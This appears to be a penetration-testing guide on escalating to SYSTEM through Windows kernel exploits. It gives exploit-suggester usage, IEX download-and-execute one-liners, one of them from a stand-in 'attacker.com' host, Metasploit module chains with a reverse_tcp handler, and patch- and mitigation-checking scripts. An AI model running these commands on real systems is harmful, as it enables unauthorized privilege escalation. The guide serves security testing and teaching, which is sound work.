Kernel-level privilege escalation
Understanding Kernel Exploitation
What Makes Kernel Exploits Viable
Kernel-level privilege escalation exploits vulnerabilities in the Windows kernel to gain SYSTEM privileges. These exploits target the core operating system rather than user-mode applications or misconfigurations.
Why Kernel Exploits Work:
Direct privilege elevation - Bypass user-mode security boundaries
System-level access - Complete control over the operating system
Token manipulation - Modify process tokens at kernel level
Bypass most protections - Operate below user-mode security mechanisms
Modern Reality: Kernel exploitation success has dramatically decreased due to modern mitigations like SMEP/SMAP, Kernel CFG, HVCI, and PatchGuard. Most attempts result in system crashes rather than clean escalation.
Automated Vulnerability Assessment
Windows Exploit Suggester
Setup and Execution:
# Download and setup Windows Exploit Suggester
git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git
cd Windows-Exploit-Suggester
# Update exploit database
python windows-exploit-suggester.py --update
# On target system, generate systeminfo
systeminfo > systeminfo.txt
# Transfer systeminfo.txt to attacker machine and analyze
python windows-exploit-suggester.py --database 2023-01-01-mssb.xls --systeminfo systeminfo.txt --ostext "windows 10" --patches KB4013081Output Analysis:
# Example output showing potential kernel exploits:
# [E] MS16-032: Microsoft Windows 7-10 / 2008-2012 R2 (x86/x64) - Secondary Logon Handle
# [E] MS16-135: Microsoft Windows 7-10 / 2008-2012 R2 (x86/x64) - Win32k Elevation of Privilege
# [E] MS17-017: Microsoft Windows 7-10 / 2008-2012 R2 (x86/x64) - GDI Palette Objects Local Privilege EscalationSherlock PowerShell Enumeration
Automated Kernel Vulnerability Detection:
# Download and execute Sherlock
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1')
# Run comprehensive vulnerability check
Find-AllVulns
# Target specific kernel vulnerabilities
Find-MS16032
Find-MS16135
Find-MS17017
Find-CVE20177199PowerUp Integration:
# Use PowerUp for additional kernel checks
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1')
# Check for kernel-related misconfigurations
Invoke-AllChecks | Where-Object {$_ -match "kernel\|driver"}Metasploit Local Exploit Suggester
Automated Exploit Enumeration:
# Use Metasploit's local exploit suggester
use post/multi/recon/local_exploit_suggester
set SESSION 1
set SHOWDESCRIPTION true
run
# Filter for kernel exploits specifically
use post/multi/recon/local_exploit_suggester
set SESSION 1
set KEYWORD kernel
runTool-Based Kernel Exploitation
MS16-032 (Secondary Logon Handle)
PowerShell Implementation:
# Download and execute MS16-032 PowerShell exploit
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-MS16032.ps1')
# Execute with default command
Invoke-MS16032
# Execute with custom command
Invoke-MS16032 -Command "powershell -ep bypass"Metasploit Module:
# Use MS16-032 Metasploit module
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
set SESSION 1
set LHOST attacker_ip
set LPORT 4445
runEmpire Framework:
# Use Empire's MS16-032 module
(Empire) > usemodule privesc/ms16032
(Empire: powershell/privesc/ms16032) > executeMS16-135 (Win32k Elevation)
Metasploit Exploitation:
# MS16-135 Win32k exploit
use exploit/windows/local/ms16_135_win32k_elevation_of_privilege
set SESSION 1
set LHOST attacker_ip
set LPORT 4446
runPowerShell Version:
# Download MS16-135 PowerShell implementation
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/master/Invoke-MS16-135.ps1')
# Execute the exploit
Invoke-MS16135CVE-2021-1732 (Win32k Elevation)
Public Exploit Tools:
# Download CVE-2021-1732 exploit
git clone https://github.com/KaLendsi/CVE-2021-1732.git
cd CVE-2021-1732
# Transfer compiled executable to target
# Execute on target system
CVE-2021-1732.exePowerShell Wrapper:
# PowerShell implementation of CVE-2021-1732
IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/CVE-2021-1732.ps1')
Invoke-CVE20211732CVE-2022-21882 (Win32k Elevation)
Executable Exploit:
# Download CVE-2022-21882 from GitHub
git clone https://github.com/KaLendsi/CVE-2022-21882.git
# Transfer to target and execute
CVE-2022-21882.exe cmd.exeMetasploit Integration:
# Check if Metasploit has module for CVE-2022-21882
search CVE-2022-21882
search 2022 win32k
# Use if available
use exploit/windows/local/cve_2022_21882_win32k
set SESSION 1
runFramework Integration
Metasploit Kernel Exploit Workflow
Comprehensive Kernel Testing:
# Step 1: Get initial session
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST attacker_ip
set LPORT 4444
exploit -j
# Step 2: Run exploit suggester
use post/multi/recon/local_exploit_suggester
set SESSION 1
run
# Step 3: Try suggested kernel exploits in order
# MS16-032
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
set SESSION 1
run
# MS16-135 if MS16-032 fails
use exploit/windows/local/ms16_135_win32k_elevation_of_privilege
set SESSION 1
run
# MS17-017 if others fail
use exploit/windows/local/ms17_017_gdi_palette_escalation
set SESSION 1
runAutomated Target Assessment
System Information Gathering
Rapid Assessment Tools:
# SystemInfo analysis script
function Get-KernelVulnInfo {
$os = Get-WmiObject -Class Win32_OperatingSystem
$build = $os.BuildNumber
$version = $os.Version
Write-Host "OS: $($os.Caption)"
Write-Host "Build: $build"
Write-Host "Version: $version"
# Check for known vulnerable builds
$vulnerableBuilds = @{
"10240" = @("MS16-032", "MS16-135")
"10586" = @("MS16-032", "MS16-135")
"14393" = @("MS16-135", "MS17-017")
"15063" = @("CVE-2017-7199")
"17134" = @("CVE-2018-8120")
"17763" = @("CVE-2019-0803")
"18362" = @("CVE-2020-1054")
"19041" = @("CVE-2021-1732")
"19042" = @("CVE-2021-1732", "CVE-2022-21882")
}
if ($vulnerableBuilds.ContainsKey($build)) {
Write-Host "Potentially vulnerable to: $($vulnerableBuilds[$build] -join ', ')" -ForegroundColor Red
} else {
Write-Host "No known kernel exploits for this build" -ForegroundColor Green
}
}
Get-KernelVulnInfoPatch Analysis:
# Check for critical kernel patches
$kernelPatches = @(
"KB3139914", # MS16-032
"KB3124280", # MS16-135
"KB4013081", # MS17-017
"KB4499175", # CVE-2019-0803
"KB5000802", # CVE-2021-1732
"KB5010793" # CVE-2022-21882
)
foreach ($patch in $kernelPatches) {
$installed = Get-HotFix -Id $patch -ErrorAction SilentlyContinue
if ($installed) {
Write-Host "$patch is installed - $(($installed.Description))" -ForegroundColor Green
} else {
Write-Host "$patch is NOT installed - System may be vulnerable" -ForegroundColor Red
}
}Mitigation Detection
Modern Security Feature Check:
# Check for modern kernel mitigations
function Test-KernelMitigations {
# Check for HVCI/VBS
$hvci = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard" -Name "EnableVirtualizationBasedSecurity" -ErrorAction SilentlyContinue
if ($hvci -and $hvci.EnableVirtualizationBasedSecurity -eq 1) {
Write-Host "HVCI/VBS is enabled - Kernel exploits very unlikely to work" -ForegroundColor Red
}
# Check for Hypervisor
$hyperv = bcdedit /enum | Select-String "hypervisorlaunchtype"
if ($hyperv -match "Auto") {
Write-Host "Hypervisor protection active" -ForegroundColor Red
}
# Check Windows Defender status
$defender = Get-MpComputerStatus -ErrorAction SilentlyContinue
if ($defender -and $defender.RealTimeProtectionEnabled) {
Write-Host "Windows Defender Real-time protection enabled" -ForegroundColor Yellow
}
# Check for CFG
$cfg = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\kernel" -Name "MitigationOptions" -ErrorAction SilentlyContinue
if ($cfg) {
Write-Host "Kernel CFG may be enabled" -ForegroundColor Yellow
}
}
Test-KernelMitigationsTool Recommendations by Target
Windows 10 Targets
Build-Specific Tool Selection:
# Windows 10 1507 (Build 10240)
# Best tools: MS16-032, MS16-135
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
use exploit/windows/local/ms16_135_win32k_elevation_of_privilege
# Windows 10 1903+ (Build 18362+)
# Limited options: CVE-2021-1732, CVE-2022-21882
# Check specific build numbers and patch levels firstLegacy Windows Targets
Windows 7/8.1 Exploitation:
# More kernel exploits available for legacy systems
# MS16-032, MS16-135, MS17-017 all viable
# Use exploit suggester for comprehensive analysis
use post/multi/recon/local_exploit_suggester
set SESSION 1
set SHOWDESCRIPTION true
run
# Try exploits in reliability order:
# 1. MS16-032 (most reliable)
# 2. MS16-135 (good success rate)
# 3. MS17-017 (backup option)Server Targets
Windows Server Exploitation:
# Server 2008/2012 - Many kernel exploits work
# Server 2016+ - Limited options, enhanced mitigations
# Focus on well-tested server exploits
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc # Works on 2008-2016
use exploit/windows/local/ms16_135_win32k_elevation_of_privilege # Server 2008-2016Operational Considerations
When Kernel Exploits Are Worth Attempting
Target Assessment Criteria:
Legacy Windows versions (7, 8.1, Server 2008/2012)
Unpatched systems confirmed via exploit suggester
Missing critical security updates
No modern mitigations (HVCI/VBS disabled)
Air-gapped environments with limited patching
Risk Management
System Stability Risks:
High BSOD probability on modern systems
Service disruption if exploit fails
System reboot may be required
Mitigation Strategies:
Test on similar systems first if possible
Maintain alternative access methods
Document system state before exploitation
Have rollback plan if system becomes unstable
Last updated
Was this helpful?